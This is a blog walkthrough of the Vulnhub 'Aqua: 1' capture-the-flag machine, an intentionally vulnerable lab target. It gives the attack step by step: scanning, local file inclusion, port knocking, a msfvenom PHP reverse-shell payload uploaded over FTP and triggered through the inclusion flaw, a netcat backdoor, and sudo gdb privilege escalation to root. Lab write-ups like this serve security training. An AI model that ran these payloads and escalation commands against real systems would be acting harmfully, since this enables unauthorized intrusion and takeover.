aqua: 1 walkthrough Vulnhub CTF

Aqua: 1 walkthrough Vulnhub CTF

Today we are Solving another Vulnhub CTF aqua: 1 is Created by yunaranyanca This CTF is hosted on Vulnhub Server You can download here

First Scanning our local network and finding our target IP

aqua: 1 walkthrough Vulnhub

Nmap aggressive port Scanning

nmap -A
aqua: 1 walkthrough Vulnhub

dirb scanning time we found may URL I used a filter .php and we see our output is filter .php extension

dirb -X .php /usr/share/wordlists/dirb/big.txt
aqua: 1 walkthrough Vulnhub

When I open target IP our browser and we found this page.

When clicking the “Sure, I’ll help” button, we are redirected to another page which shows credentials.

dirb scanning time we found another URL login.php I open the URL and I see a login page, I try to log in this credential: vashivmegmin and we are successfully connected to it
aqua: 1 walkthrough Vulnhub

This URL is vulnerable to LFI(local file inclusion) we see the target system passwd file

I log in ftp but I see Connection timed massage I go to more deeply enumeration and I found Knocked Firewall implement this server
aqua: 1 walkthrough Vulnhub
Port knocking
knock 1234 5678 9012

Log in with FTP Again

  • username: megumin
  • password: watashiwamegumin

dir command to we see all file our current directory file and permissions

aqua: 1 writeup Vulnhub

Creating a msfvenom php reverse shell payload

msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4545 -f raw >/tmp/shell.php

After creating a payload again login with ftp same username and password we already see directory permission ( 757 mean root user full permission and other users same permission the only group read and execute file )

cd production

this time uploading our shell web directory

put shell.php

We see our shell is uploaded successfully now executing our shell through LFI ( Local File Inclusion ) vulnerability

aqua: 1 walkthrough Vulnhub

I already start our msfconsole and we shell I got a reverse shell target machine


use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
  • set lhost
  • set lport 4545
  • run
aqua: 1 writeup Vulnhub

now I run shell command we see blank shell this time import bash shell through python module

python3 -c 'import pty;pty.spawn("/bin/bash")'

The current user is www-data and has very limited permissions.


And ID command to we see our current user shell is www-data we have already megumin user password I run the su (Switch User) command megumin and user password again we shell our shell is changed www-data to megumin

su megumin
aqua: 1 writeup Vulnhub

Let’s check with sudo -l sudoers file

sudo -l

We see a backdoor script sudoers file now I open the script cat command and we see an automatic natcat connection bash script I run the command with sudo and backdoor is opened

cat /home/aqua/Desktop/backdoor
sudo /home/aqua/Desktop/backdoor
aqua: 1 writeup Vulnhub

Connecting to backdoor

nc 1337

again import python modules spawn a shell

python -c 'import pty;pty.spawn("/bin/bash")'

I run the ID command and we see our last user is changed to aqua user I run again sudo -l command and I found may script but I try gdb privilege escalation

sudo -l

Privilege Escalation

GDB privilege escalation more about gdb see here

sudo gdb -nx -ex '!bash' -ex quit
cd /root


Reading our Last root flag

cat root.txt
aqua: 1 writeup Vulnhub
Sar 1 read

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.

View all posts by Rahul Gehlaut →

Leave a Reply

Your email address will not be published. Required fields are marked *